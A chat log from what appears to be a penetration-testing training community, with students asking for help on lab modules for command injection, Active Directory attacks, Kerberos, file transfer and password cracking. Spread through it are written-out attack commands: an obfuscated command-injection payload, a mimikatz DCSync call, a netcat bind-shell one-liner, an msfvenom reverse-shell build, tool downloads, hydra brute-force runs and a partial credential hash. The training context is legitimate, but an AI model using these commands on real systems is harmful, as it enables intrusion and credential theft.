#modules

1 messages Β· Page 199 of 1

lusty thicket
#

why the new lines %0A ?

frozen mesa
#

Since assignment 3 i start the payload with that, because it worked every time. second one because i thought it was nessecary.

rotund steppe
#

No not yet, trying out bruteforcing the subdomains I found with dig- is that right?

lusty thicket
frozen mesa
#

and the third, in the base64 cmd is to replace a space char

lusty thicket
#

you can use IFS or tab for that

soft cedar
shut wraith
#

Hello. This script doesnt work. It says when running the script that it's not authenticating. How can I fix it:

USER user 
password 
binary 
GET ftp.py 
bye ```
frozen mesa
#

||bash(base64${IFS}-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)|| gives me no output but a 200 code, with ||%0a%09$bash(base64${IFS}-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=) ||i get the ping results only

lusty thicket
frozen mesa
rotund steppe
#

I did it πŸ₯³

frozen mesa
rotund steppe
#

Fumbling through enumerating the subdomains and then finding the answer on the forums while I was doing that πŸ˜‚

#

I was thinking I had to use a different target dns server but I didn't

#

had to learn more about what a zone transfer actually is

frozen mesa
frozen mesa
scarlet jewel
#

Hey, doing the footprinting MSSQL module. I was wondering if there was a way to use the named pipe to connect to the service from a Linux machine. mssqlclient does not seem to support this

shut quest
sterile epoch
#

I logged into MS01 using svc_sql. I can access the admin powershell from this user. i tried to install RSAT but it popped an error. I dunno what else to look for

#

I performed a kerberos but it only returned the hashes I retrived from the initial foothold

next bronze
#

nope I'm talking about within the machine itself, think post exploit pillaging

sterile epoch
#

I dumped lsass and got the cleartext

#

and username

#

thanks. I thought since the module is on ad I had to use ad tools. I guess I get why they say to follow the path cuz everything is connected

next bronze
#

if only someone wrote a tool to make that process easier kekfliz

sterile epoch
#

they have and those are peas and autopwn scripts

#

but its forbidden

#

they will make the work easy but they suck the skills from young pentesters and make them sk's

#

my level is not high enough to afford the backlash of the forbidden scrolls.

next bronze
#

peas doesn't have autopwn stuff, and any tool is allowed in cpts

#

I'm talking about lsass and stuff

sterile epoch
#

well I guess I can write a simple ps script for that but nothing complex

patent oak
#

Passwords Credential Hunting in Linux sadglas

#

Maybe I'm tired today but that just took my soul

placid edge
#

just crossed another one off. AD skills assesment and currently at 99.17% . Exam getting closer :/

#

manged to do it without tips or any help tho so feeling a lot better

next bronze
#

wdym by logon to? winrm? rdp? or physically logging on?

#

no, I don't see querying every machine the user can logon to being useful

#

if you have DA, you can safely assume the account can logon to every machine

#

and there's no way to check physical logon, rdp/winrm can be disabled but they can still login physically

#

sharphound has the loop thing which you can let it run for hours and catch hasSession, that's a way to know the user is logged on for sure

shut sonnet
#

can anybody help me the api key question in JavaScript Deobfuscation is showing incorrect answer for the api key

sterile epoch
#

I am really confused with dcsync .\mimikatz.exe "privilege::debug" "lsadump::dcsync /user:INLANEFREIGHT\tpetty /domain:INLANEFREIGHT.LOCAL" "exit" I checked the permissions for this user and still I am getting auth error. I tried to rdp using the creds and hash but it did not give me a session. I then tried to use runas even then its not working any idea why ?

next bronze
fathom pendant
#

or if a mod did to gaslight you lmao

next bronze
steady yew
#

Hello, I'm very new and working on my first module. I think I'm on the right track but would love some guidance. I'm on the Firewall and IDS/IPS Evasion - Hard Lab and ran this nmap scan: sudo nmap 10.129.2.47 -Pn -n --disable-arp-ping --packet-trace
This is the output:

PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
138/udp open|filtered netbios-dgm
Service Info: Host: NIX-NMAP-HARD

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1154.52 seconds

Now I feel like I should do something with port 137 but that's where I'm kind of lost. I feel like I could do something with the scripting engine but idk what information to feed it to find an ideal means of attack. Am I on the right track or am I getting tripped up on nothing? Also before this scan I did a default scan and saw that tcp 22 and 80 are open. Any guidance would be appreciated.

mint reef
#

Has anyone here done the new CRT exam?

fathom pendant
buoyant void
steady yew
fathom pendant
storm grove
#

reading these i feel like such a noob fatkek

next bronze
thorn urchin
#

jesus the pivot they give you for the kerberos attacks module skill assessment is so slow

#

setting up a proxy just cause its unbearable to use

steady yew
fathom pendant
#

Permission denied is usually a bash error

steady yew
#

Good to know. I'll keep that in mind going forward.

drowsy basin
#

Hello, I am new here, I want to ask how blocking a Facebook account offended you

fathom pendant
#

2 things:

  1. where is this going?
  2. this really isn't the channel for that
drowsy basin
#

Where is the right channel for me

#

To solve my problem

next bronze
#

facebook's discord

fathom pendant
#

reading the card explains the card the linked channels, informs you of what the server is about

#

this server has nothing to do with facebook, nor any social media

errant swift
#

hey, u got any update on this? atm i m using try and error... i think this cant be we way... :/

buoyant void
# next bronze it is if you have some experiecne, SA 1 can be done with 4/5 commands

My only experience is with the AD modules so hopefully that's sufficient, I've been going over each AD section at least twice because I admit it's out of my element a bit but I think I'm getting the hang of it. I was a bit confused last night when I was reading the Kerberos Double Hop problem section but that might have been because it was 4 am and I was tired so gonna look at it with fresh eyes today

next bronze
buoyant void
#

But I suppose there are scenarios I'm not considering where you'd need to double hop

next bronze
#

when you don't have a pivot set up and need to winrm inside a winrm, sure. but you can always load rubeus and inject a ticket

fathom pendant
#

^

buoyant void
#

right that makes sense. This module is really teaching me how little I know about the Windows OS lol

fathom pendant
#

I mean it's also showing how dumb it can be

#

but AD is good for permission delegation Β―_(ツ)_/Β―

next bronze
#

I mean there's nothing inherently insecure with AD, as with all configurable systems, it all depends on how it's set up. ex. even the best edr can be made useless if it isn't configured properly

fathom pendant
#

yep

#

that's why i said dumb, not necessarily insecure

thorn urchin
#

For the Kerberos Attacks skill assessment is it supposed to be that all the impacket scripts return ldap errors even with valid credentials or am I just doing something grossly wrong?

next bronze
#

it shouldn't

#

did you add dc to hosts

thorn urchin
#

yup, netexec can use the same creds and talk to the DC over SMB and LDAP just fine

#

its literally just the impacket family that is complaining with the same creda

#

doesnt matter if I do it from my host or the provided attack host either

next bronze
#

monkaHmm weird, I don't think I used impacket for the SA

thorn urchin
#
[-] Error in bindRequest -> invalidCredentials: 8009030C: LdapErr: DSID-0C0906B5, comment: AcceptSecurityContext error, data 52e, v4563
#

the error in question

#

the invalid credentials are misleading though as they def work. Google suggests its an issue with the ldap library impacket uses possibly.

#

Guess ill just have to mess around without impacket 😭

next bronze
#

you don't need impacket for that I think, but maybe reset the lab

compact halo
#

I may be having a slow day:
Password Attacks -> Windows Lateral Movement
-> Pass the Ticker From Linux
I am having issues accessing the david@inlanefreight.htb account - My steps below:

  1. add the spawned machine ip to /etc/hosts with inlanefreight.htb
  2. attempted to access via domain name with user provided
    -> ssh david@inlanefreight.htb -p 2222 # type yes and the password provided by HTB - not able to log in
  3. Attempted to access using the username@ip-addr -p 2222 > yes > password given by HTB

Not able to get access. Is there something I am missing?
Oh yea, I did reset the machine, my kali vm, and the vpn connection.

fathom pendant
#

but i could be wrong, it's been a minute

compact halo
fathom pendant
#

also wdym password provided by htb? the only password provided is for htb-student

#

ahhh

#

they may have changed that section or i missed it

#

Β―_(ツ)_/Β―

buoyant void
fathom pendant
#

so i couldn't recall if they used .htb or .local

next bronze
#

what other mdoules use .htb? I don't remember seeing it

fathom pendant
#

just as the fyi

buoyant void
#

It messed me up at first cause I assumed in the AD module it was .htb and didn't read carefully that it was something different

fathom pendant
compact halo
#

Thanks a bunch. Wasn't aware of that. david@inlanefreight.htb@ip-addr

fathom pendant
raven lagoon
#

i would suggest the academy to use other TLDs like .gay or .hom

compact halo
#

It's always been .htb for, me, but I have only been at this for a month or so

next bronze
raven lagoon
#

are BoF modules good for OSCP prep?

fathom pendant
#

most modules, especially the more web related ones, will use the .htb

fathom pendant
compact halo
raven lagoon
#

a friend said that it depends, if you are lucky or not

buoyant void
fathom pendant
#

i mean; you can easily google the pen-200 course

raven lagoon
#

bc they change the machines every month or smth

next bronze
fathom pendant
#

and find all the covered domains

#

you could only still find it before they transitioned to the new AD set

raven lagoon
#

thats cool

#

my small brain wasnt able to learn all of that

#

so the CPTS course should cover everything

fathom pendant
#

it covers most things that would be on OSCP

buoyant void
#

Speaking of OSCP if I read this correctly you're not permitted to use MSF during the exam, and this might sound like a really simple question but there's been a lot of HTB modules that rely on MSF to set up a multi-handler listener to catch shells. How would we do that without MSF? Netcat?

fathom pendant
#

i think there's like a few differences

fathom pendant
#

msf is mostly just a collection of PoC exploits Β―_(ツ)_/Β―

raven lagoon
buoyant void
fathom pendant
#

netcat works

buoyant void
fathom pendant
#

pwncat-cs works

buoyant void
raven lagoon
#

same for me

fathom pendant
jolly cradle
#

I can generally answer anything about the OSCP as a former OffSec employee if needed

#

Feel free to DM

fathom pendant
#

i.e. saves the whole python3 -c 'import pty;pty.spawn("/bin/bash");' thing

buoyant void
fathom pendant
#

pwncat also has some recon tools

raven lagoon
#

nah im gonna build my own listener in rust idc

next bronze
#

there's already a rustcat kekw

raven lagoon
#

mine will be better

buoyant void
jolly cradle
next bronze
jolly cradle
#

I think the increase in exam difficulty is subjective. For some, AD is much easier to understand then that of a BOF which you more then likely will not be doing unless you are going into binary exploitation and such. For others BOF was super easy.

thorn urchin
jolly cradle
#

Really just a matter of what does the individual struggle with more

next bronze
jolly cradle
#

Difficulty is just a subjective thing though so hard to say.

analog dock
#

Honestly in hindsight I don’t think my exam was that difficult

thorn urchin
# next bronze which question

in-between the which user allows you to connect as admin to the server with unconstrained delegation and the next one.

I know the user because bloodhound still worked, and I know what attack I ought to do to gain their creds. But the main tool for it is impacket related.

Im looking at some alternative tools now that arent in the module to try them out.

jolly cradle
#

I think its also the "luck of the draw" on what you get host wise and then do you have weaknesses that unfortunately come to light on your exam from your exam host set

analog dock
#

And that was supposed to be the impenetrable set

#

I think it was a little far fetched, but it’s not too uncommon

next bronze
thorn urchin
#

I just have the username

next bronze
#

ah, what attack can you do if you have a username

thorn urchin
#

kerberoasting

next bronze
#

yeah, netexec can do that too

next bronze
thorn urchin
#

yeah will try that out, my pwnbox instance reset on me(im at work lul) so Ill have to reset up some things

#

Im just curious what the intended route was because the module was before that was added

next bronze
next bronze
frosty spade
#

howdy folks can someone whos completed doc and reporting verifiy my svc_reporting hash real quick in a dm hashcat isnt reqonizing it

analog dock
thorn urchin
#

darn apparently Inhave actual work to do

#

parts arrived. ill have to return to the assessment later

next bronze
analog dock
#

Which assessment?

thorn urchin
#

Kerberos Attacks. Has some oddity in it

analog dock
analog dock
frosty spade
#

pretty please with cherries on top

thorn urchin
analog dock
#

What part?

thorn urchin
#

any part. impacket straight up doesnt authenticate properly

next bronze
frosty spade
#

svc_reporting:7608:aad3b435b51404

next bronze
#

hash type?

hardy socket
#

hey folks, been struggling with the last question for Kerberos Attacks: Skills Assessment. I managed to catch j*k krbtgt but when i try to access the \DC01\Secret Share\flag.txt it tells me the network name cannot be found. What am i not getting this time?

frosty spade
#

ntlm

#

i dumped the ntds

#

i tried not specifiying the type and it still didnt work

next bronze
#

just take the part after 7608:
aad3b435b5140...:nthash

analog dock
thorn urchin
#

the aad... is also typically an empty part of the hash, id skip it and use the next part of the hash.

thorn urchin
analog dock
next bronze
#

i think it's both, I'm spinning up the lab to test it out

thorn urchin
next bronze
thorn urchin
#

have a couple diff tools I can try out if work slows down again

frosty spade
#

getting token length exception when i do -m 1000

thorn urchin
#

but its weird impacket doesnt work

fathom pendant
onyx dust
fathom pendant
#

i'm pretty sure it's ntlmv2 not ntlm

onyx dust
#

their labs are so terrible but the community is excellent πŸ™‚

hardy socket
next bronze
jolly cradle
thorn urchin
frosty spade
#

not working maybe wrong hash lsass dump transfer is taking forever and a day

thorn urchin
#

and rubeus is the tool they teach for that attack type too

fathom pendant
hardy socket
next bronze
frosty spade
#

yeah i was gonna try again with what i get from the extraction since the dump from ntds isnt working for me

#

have you done the module can i dm to compare with what i got

next bronze
#

I don't have the raw hash, it should be something like aad3b435b51404eeaad3b435b51404ee:a1a9bb19bc5cfa482120111111d97417

hardy socket
next bronze
#

rubeus is all you need

next bronze
hardy socket
thorn urchin
crystal steeple
#

hello , im on the shells and payloads module and trying to set a bind shell but i try to bind a bash shell to tcp session using : rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>& 1 | nc -l [IP][port] > /tmp/f

#

it doesnt seem to be executed

#

is it because of my pc?

next bronze
#

that's a revshell, not a bind shell

crystal steeple
#

its literally says a bind shell in the bind shell section :0

next bronze
#

oh oops yeah it is, never used it before

#

so if it's a bind shell once you start it, it will listen for a connection

#

...wait why are you running it on your host

crystal steeple
#

wait..

#

okay im just dumb

#

thank you man !!

fathom pendant
#

literally the first thing i noticed too

crystal steeple
#

lol

hardy socket
# next bronze rubeus is all you need

I'm missing something. So while on the S****01 I monitor with Rubeus and catch j** tgt. I renew it, then i ask for tgs to the cifs of dc01, and I get it. But i still cannot access the Secret Share. I'm using the steps from the lesson on the unconstrained delegation. Please help

next bronze
#

you don't need to specifically request a tgs, renew the ticket to have it injected then just access the share

#

I just copied it and turned it into a ccache

hardy socket
paper gust
frosty spade
#

i got it thanks

paper gust
#

ah ok

hardy socket
next bronze
#

well did you make sure the netowrk name is right?

ocean night
#

Take it to DM if you want to share specifics please πŸ™‚

fathom pendant
#

kek hi g0blin

ocean night
#

Yo πŸ‘‹ How're things?

fathom pendant
#

pretty decent, started a 5 week course "Intro to PC Operating Systems"... So far it's just been winders πŸ™„

ocean night
#

Well I hope it gets interesting πŸ˜‰ Not to say Windows isn't interesting, but on the name of the course.. unsure it'll go very deep πŸ˜…

#

Is it a security focused course, or just like an introduction?

fathom pendant
#

some silly definition stuff

#

differences like 32-bit being limited to only 4GB of memory

ocean night
#

Is this a stepping stone to another course or something, or it just grabbed your interest?

fathom pendant
#

stepping stone for cybersecurity stuff

#

another course i'm taking is Intro to Psychology

ocean night
#

Nice, is this on OpenUniversity or something?

fathom pendant
#

nah; it's through Miller-Motte University. Exp graduation in early 2025

ocean night
#

That's not how it works..

thorn urchin
#

I mean technically it is offtopic.....

#

but if theres anyone thats allowed to break the rules its you πŸ˜‚

fathom pendant
ocean night
#

There's no offtopic rule πŸ€·β€β™‚οΈ But ok

#

Just enjoy engaging with people, wherever it is.

thorn urchin
#

People have been muted/booted here before

fathom pendant
#

ye

#

it just depends on the extent of the offtopic convo

thorn urchin
#

yeah thats the core of it

ocean night
#

Well I guess I'll shut up then 😊

thorn urchin
#

Usually its just us having to tell some unverified person to verify to access the general chat

#

and its a 75/25 split of either raging or actually following instructions

viral pebble
#

hey can anyone help me crack a hash

heavy marsh
#

Getting weird results in active directory. I am not getting a transfer from my python http server with:

Invoke-WebRequest -Uri "http://<ip>:8080/chisel.exe" -OutFile "C:\chisel.exe"

but after I do

Invoke-WebRequest -Uri "http://<ip>:8080/PowerView.ps1" -OutFile "C:\PowerView.ps1"

I do Import-Module .\PowerView.ps1 and am then able to transfer chisel. The PowerView transfer works first try no problem

#

Why?!

#

PowerView.ps1 isn't imported before I transfer PowerView, so I'm not sure what's going on!

autumn mason
#

Hello guys can anyone help me with this module WINDOWS EVENT LOGS & FINDING EVIL i am quite new to windows event logs i thought i created the correct view and still cannot solve it

onyx dust
autumn mason
#

i am on the very first partπŸ˜…

onyx dust
#

oh. they dont show win-event til the end

#

what are u trying

autumn mason
#

i created a custom view showing only events that changed the policy

#

this is the exact question: Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: T_W_____.exe

#

i created a filter based on the computer name that was relevant to the event that took place on 8/3/2022 and only showed audits from that computer

#

I tried that but there is no logs under that id

heavy marsh
#

Username from question 5 and password from question 6 of the Active Directory Skills Assessment 1 does not give RDP access.

onyx dust
fading cosmos
#

Hi, Im new

#

Is it yes or yes do it on Linux?

autumn mason
heavy marsh
#

BloodHound GUI node information is cut off, any way to fix this? Hasn't been reported on the github issues page but I wanted to check if anyone has a fix first before posting

#

and it's formatted weird

onyx dust
# autumn mason bet

filter for event 4907 and use the date in the question to find your way to the answer.

heavy marsh
#

Anyone have a hint on the last question of AD Skills Assessment 1? I am trying to RDP in with the tp***y credentials, but it is not working.

#

I tried all three ip addresses, even the DC01, just to be sure

frosty spade
#

you gotta tunnel and pivot if you havent

#

and i belive tpetty was ment to get admins hash not rdp the rdp is with admin

lofty wave
#

Anyone else having issues spinning up targets in any of the academy modules?

cobalt trench
#

I can't get any targets to spin up

lofty wave
#

Haha ok, so I'm not nuts

#

Same, refreshed. Logged out and back in. Nada

#

Darn it, I'm on a roll also

next bronze
#

it's working for me

lofty wave
next bronze
#

kerberos attacks, I can try spawning yours in a sec

lofty wave
#

ok sweet

#

I'm on the log rotate sub module

ornate turret
#

Having similar issues with Nibbles - Enumeration, its been "deploying" for awhile now and I cant stop it..

limber surge
#

my target is spawing for a while alr.

lofty wave
#

ok, same results in other labs for me. Just tried spinning up the assessments in the nmap module. Same results. Just spins and doesn't come up

limber surge
#

can already for mine

lofty wave
#

oh wait, they just came up. someone rebooted something lol

heavy marsh
#

So I ran secretsdump for the Administrator user for the DC01 ip address. I am kind of stuck here now.

#

Do I kerberoast at this point? The DCSync Module dead ends

next bronze
heavy marsh
#

Or should I try to crack the hash?

ornate turret
shut quest
heavy marsh
#

At least with the dcsync module

#

I got the kerberos tickets, but there was no plain text

quasi wave
#

hi I am logged into this IMAP server for the IMAP/POP3 section of footprinting. I'm trying to get the administrator's email address. Attached is what I have tried so far.

#

can someone help?

#

I managed to log in as another user besides admin via sslconnect

feral geyser
quasi wave
#

I want to figure out the administrator email address. Please don't give me the answer but I have been stuck on this for a few days and could use a push in the right direction.

#

that would be great please

heavy marsh
#

Why is this not working?!

#

I imported PowerView.ps1

#

I'm trying to finish DSCyncing the last question of the AD Skills Assessment 1

next bronze
heavy marsh
#

How do I finish DCSync? I have run secretsdump, but can't get anything in my powershell to work

next bronze
heavy marsh
#

Which one of these do I use?

#

I can't seem to find the right hashcat mode for any of them. Just want to make sure I am looking at the right ones.

next bronze
#

what can do you with a ntlm hash besides cracking it

heavy marsh
#

I'm thinking pass the hash? Can't figure it out though.

shut quest
heavy marsh
#

So I was able to figure it out, did a pass the hash with psexec, had to go back to the password attack module to figure it out

#

So the first hash here, what kind of hash is it? Looking it up online it showed as MD5.

#

I thought it was an NTLM

fathom pendant
#

:) usually with pth you use the NT bit

next bronze
fathom pendant
next bronze
#

oh is it not

fathom pendant
#

it is indeed not

next bronze
#

seems like fundamentals are missing then kekw

fathom pendant
#

the only other prereq path it's on is the soc analyst pre-req path

heavy marsh
#

The first one pictured. I cut off the remaining portion in the screenshot for spoilers

#

It worked

#

Just trying to understand why because the module used a different format and really didn't go in to detail

next bronze
#

the lm part of the hash is usually a blank hash, it's just a shortcut to let impacket know without having to paste the whole thing

shut quest
fathom pendant
#

don't ntlm hashes not care about capitalization?

#

or am i misremembering

shut quest
fathom pendant
stray scaffold
#

LM hashes are case insensitve. NTLM are def case sensitive.

next bronze
#

yeah the nt hash is case senstivie

fathom pendant
#

i knew one part was Β―_(ツ)_/Β―

shut quest
#

Oops, yes >.<

cobalt trench
#

Anybody able to get Password Attaks - Pass TheHash target to spin up?

fathom pendant
#

change vpn regions

sleek moss
#

how do i access the tareets o
Shells & Payloads

Page 16
The Live Engagement

The Live Engagement

fathom pendant
#

you're given a linux attack host to rdp into

#

if you're referring to the web targets: firefox works

sleek moss
#

ik but firefox isnt there on the attack host

fathom pendant
#

yes it is

#

run firefox in the command line

#

also make sure you take notes of the desktop ;)

sleek moss
#

oh i c danke

sleek moss
#

what happened

sick mural
#

Hi all, I need little help and info on Module:Linux Privilege escalaiton : section SUDO lab, I am trying to compile the exploit as per the section provide info but i am getting glibc6 error saying c file cannot be compilted because glibc libara is missing . I am following this process to create the binary.

#

is there a problem in the lab target machine or something?

fathom pendant
#

how are you cloning it; afaik the target machines don't have internet access?

sleek moss
#

does anyone my ip adress for that

#

└──╼ $msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.129.204.126 LPORT=4444 -f war > shell.war
Payload size: 1091 bytes
Final size of war file: 1091 bytes

β”Œβ”€[htb-student@skills-foothold]─[~]
└──╼ $nc -lvnp 4444
listening on [any] 4444 ...

#

i uplaod to tomcat then go to the tomcat ip address/shell

#

but it not give the shell back to me why?

sick mural
fathom pendant
#

gotcha

fathom pendant
#

do ifconfig to see all the interfaces

sick mural
#

followed two senarios. 1. Downloaded precompilted binary to target. error saying glibc6 missng. 2. Downloaded post compiled binary , same error target box has glibc 2.27 and needed is 2.34

#

i cannot downoad glibc as apt get install not in my rights on box

fathom pendant
#

can you not do a static compile?

sick mural
#

yes, i cannot do the compite on the target box

autumn pilot
#

this is not the path you need to follow to get the flag for the sudo section

sick mural
#

i know it must be straight forward , just download binary , compile run and be root but target box is stopping me by not allowing me to compile the hex.c code

fathom pendant
#

listen to dpgg he's actually done it

sick mural
#

@autumn pilot any advice on this please

autumn pilot
#

i've given you

fathom pendant
#

choose a different path

sleek moss
#

msf6 exploit(50064) > exploit

[-] Exploit failed: NoMethodError undefined method `split' for nil:NilClass
[*] Exploit completed, but no session was created.

fathom pendant
#

restart msfconsole

sleek moss
#

can anyone explain why i used the username nda password correct

#

ok ty

fathom pendant
#

sometimes it's dumb

sick mural
#

can you advice on this. is this machine issue or something else i am doing wrong

next bronze
#

there are 2 exploits given in the section, check the sudo version to find which one to use

sleek moss
#

i restarted but its the same answer

fathom pendant
sleek moss
#

yrs

#

PASSWORD admin123!@# yes Blog password
Proxies no A proxy chain of format type:host:por
t[,type:host:port][...]
RHOSTS 172.16.1.12 yes The target host(s), range CIDR identi
fier, or hosts file with syntax 'file
:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connec
tions
TARGETURI / yes The URI of the arkei gate
USERNAME admin yes Blog username
VHOST no HTTP server virtual host

Payload options (php/meterpreter/bind_tcp):

Name Current Setting Required Description


LPORT 4444 yes The listen port
RHOST 172.16.1.12 no The target address

Exploit target:

Id Name


0 PHP payload

fathom pendant
#

i think this one requires you to set an additional option

sick mural
#

got this @next bronze

fathom pendant
sleek moss
#

vhost to domain?

#

ah ic dankeschoine

fathom pendant
#

ye

gaunt sluice
#

Module : INTRODUCTION TO ACTIVE DIRECTORY
Question:
why Domain Controllers are Global type?
why the need change in another Domains?
can Domain Controllers control Ressources in another Domain and why the need that ? in which Usecases?

next bronze
#

what

fathom pendant
#

Domain Controllers only control their domains, and are linked via forests

gaunt sluice
fathom pendant
#

interdomain trusts

#

allows them to control certain aspects of other domains but not full control

sick mural
#

Many thanks @Xre0uS , @fathom pendant , @autumn pilot for point me in right direction. I was banging my head on this for the 2nd day.

#

sudo issue

#

got it working.

fathom pendant
#

don't just dm without asking for permission

gaunt sluice
acoustic owl
normal turret
#

Hey guys

#

Interactive Section with Target

#

I help with the practice question

agile torrent
#

people will be much more willing to help if you actually post your question

#

what do you need help with?

patent oak
#

Hi guys! Any ideas why I can never access a Python server hosted on my Kali machine. I use the tun0 IP and port number to try to browse from the target but no es bueno

#

It works fine when I serve it from Pwnbox

#

I do have uncomplicated firewall but have tried turning it off pepehands

sterile epoch
#

did they make changes to pwnbox. there are way more interfaces than before

next bronze
placid edge
#

Anyone i can dm for skills assesment 2 part 1? I have a list of users just cant seem to find the passwd on the active directories module

next bronze
#

AD enum & attaks SA 2 q1?

placid edge
#

yup

next bronze
# placid edge yup

what are some ways you can get a username and hash if you don't have domain credentials

#

you're already in the internal network

placid edge
#

as-rep roasting or password spraying is what im thinking

#

but havent gotten it yet so its probably something else

#

i have the username list from kerbrute

#

so i have a list of usernames and emails that im trying to as-rep roast or passwordspray. Tried a few passwords, but im afraid to lock out the users so i

#

didnt try more on that

next bronze
#

you can also try listening to the traffic

placid edge
#

so ||LLMNR||?

limber river
#

hello , wondering if someone knows why some techniques works when I am in the internal network , and did not work when I use pivoting with tools like ligolo ?

placid edge
#

would think they would connect back to me tho. I figured i needed some way to force that connection @next bronze

next bronze
#

recall how poisoning works, it could be a broadcast

placid edge
#

by force i mean like a writeable smb share that i can upload sfc or lnk files to

#

so correct me if im wrong. When they get a ip/domain they dont know, they ask "Hey, who is the owner here?" and responder picks it up and says "yo gimme dat shit"

#

just more pro over a network πŸ˜„

next bronze
placid edge
#

that went over my head

limber river
placid edge
#

thanks. I dont know why i didnt test that prior

next bronze
#

no with the actual ip

limber river
next bronze
next bronze
limber river
cobalt trench
#

Password Attacks - Pass the hash - Can somebody explain this concept to me please. I performed a pass the hash attack and gained access to julios account but now which machine am I setting up the listener on? which machine am I inputting the rev shell command etc. Thanks in advanced

placid edge
#

im so lost rn. I have the username and password. But i cant login. How am i supposed to get access to this machine lol

next bronze
#

check what services are open that you can use

placid edge
#

yeah i know. I feel like i have 100 times now

limber river
cobalt trench
#

Followed the steps in the module and I cant get the reverse shell. not sure what Im doing wrong

next bronze
#

is the ip and port correctly configured

cobalt trench
#

Yea

#

I need to set up NC on ms01 and put the rev shell script in DC01 correct?

limber river
cobalt trench
#

After running the script 3 times, it finally said "connected" and when I hit enter again the shell prompt popped up

#

looks like it was just taking a minute to load

errant elbow
#

Can I DM sm1 about Windows Privilege Escalation Skills Assessment - Part I ? Can't figure out why i cant pe using SeImpersonate...

next bronze
#

why not? try juicy potato, use different clsid

errant elbow
#

already tried all clsid that i could find for this version of windows, also tried juicypotatong & printspoofer

#

The questions for the assessment seem to indicate that im supposed to find a password before the privesc, however i would like to understand why all these exploits arent working

next bronze
#

does the user have seimpersonate

errant elbow
#

it does

next bronze
#

then it should work

rustic sage
#

I have no idea what is goin on, I wanted to double modulate everything...

minor dew
cobalt trench
#

You need to pth first then using the compromised session, check the files

#

If that makes sense

minor dew
#

You did that through rdp? I tried through my evil-winrm session but mimikatz prompt is spamming prompt then crashing throught this way

errant elbow
earnest junco
#

Anyone who is doing/has done AD Enumeration & Attacks - Skills Assessment Part II

finding MS01 really slow ?

#

Let me try it

errant elbow
ocean flume
#

Hello everyone hope yall doing great on this beautiful day todayyy. I was working on the command injection module on the new job path and got stuck on the pdf generator section. I was able to find the internal api but I don’t know what to do from here. A nudge in the right direction would be awesome.

ember coral
#

Struggling with the attacking DNS module. Attempting to run subbrute on it and keep gettin gtrackeback errors. Any idea why?

acoustic owl
#

com and htb are two different top level domains.
The resolvers.txt file should only contain the IP of the target

paper basalt
#

This password attacks module is by far the worst in CPTS, holy christ :<

limber river
paper basalt
#

im on the password mutations part, can anyone please confirm 89230 being the right amount of words in the mutated list

#

having so many issues with disconnects bruteforcing ftp already...

#

all I did was mutate the given password list using the given rules -> filtered out any passwords under length 8. Gave me 89k passwords

paper basalt
#

interesting..

#

did you alter in the custom.rule file or?

#

or did you just mutate with the given custom.rule file without any changes

#

oh, i guess you didnt remove passwords, i get 94k too with my original file

#

i guess ill use that instead then and not filter out any passwords under 8 length

ember coral
acoustic owl
#

Please do not post any flags here, your flag has a typo. That's why it doesn't work

real lion
#

The flag has a typo in the database. Your site, support , and staff are all terrible. I have not once signed on to this platform with out encountering problems.

acoustic owl
#

I am sorry if you are having problems with the site.
In this case, please contact support.

paper basalt
real lion
paper basalt
#

With that said, how do I get around this issue:

hydra -l sam -P new_list ftp://10.129.64.95 -v -t 32 -I
[DATA] max 32 tasks per 1 server, overall 32 tasks, 94044 login tries (l:1/p:94044), ~2939 tries per task
[DATA] attacking ftp://10.129.64.95:21/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[VERBOSE] Disabled child 0 because of too many errors
[VERBOSE] Disabled child 3 because of too many errors
[ERROR] all children were disabled due too many connection errors
0 of 1 target completed, 0 valid password found
thorn urchin
real lion
thorn urchin
#

?

paper basalt
#

ive been trying to find myself for years

#

@ember coral @limber river how many threads did you use in hydra? And on the attackbox or VPN? Getting sick of connection errors...

ember coral
paper basalt
#

It's not spoiling though. Thats straight from the cheatsheet kek

#

yep even 16 threads gets me insta connection errors

#

im going to exploDEEEEEEEEEEEEEEEEEEEEEE

shut wraith
#

Module: File Transfer

Trying SMB upload to share made by wsgidav
Command:
sudo wsgidav --host=0.0.0.0 --port=8887 --root=/tmp --auth=anonymous
I used:
my kali:
dir \\10.10.15.204:8887\
On windows box:
copy C:\Windows\System32\drivers\etc\hosts \\10.10.15.204:8887\
I think there is a problem with the share name. What is the share name for the share I created

ocean night
#

The dir command on Linux doesn't understand things like SMB shares.

ember coral
#

Is the Attacking DNS , running subbrute supposed to take forever? lol its finding results but been running over 30 minutes now

ocean night
#

Someone please correct me if I'm wrong πŸ˜…

fathom pendant
fathom pendant
#

also with SMB; you need to specify a sharename

frosty spade
#

anyone whos actually in the field whats the usual length of your reports what are your reports usually composed of any tricks or tips or cheats with writting reports trying to hone this skill before I take the test

shut wraith
ocean night
#

The command didn't include a share name in the path

#

Check the module notes πŸ™‚

shut wraith
ocean night
#

That's not how SMB shares work

fathom pendant
#

SMB hard requires a sharename

#

it's not an optional thing

ocean night
#

You're connecting to a computer. The computer has shares, which relate to a shared path on the computer.

fathom pendant
#

it likely defaulted to "Share" or something like that

shut wraith
#

Do u have an idea about what th share name could be

fathom pendant
#

you'd have to look up wsgidav documentation

#

if that's the command given in the module: then it should show you the sharename it might expect

ocean night
#

Oh true, this

fathom pendant
#

though usually you'd use smbserver to spin up a temp SMB server

#

never really thought of using wsgidav

paper basalt
#

damn, is it the EU peak hours messing with the infrastructure?

fathom pendant
#

my best guess would be: that the sharename might be tmp

shut wraith
fathom pendant
#

or it could be share1

#

as dumb as that sounds

shut wraith
#

If it helps this is the error I get:

   on```
fathom pendant
#

Β―_(ツ)_/Β―

#

also windows can be weird

#

do this on your kali:
smbclient -L -U "" 127.0.0.1 -p 8887

#

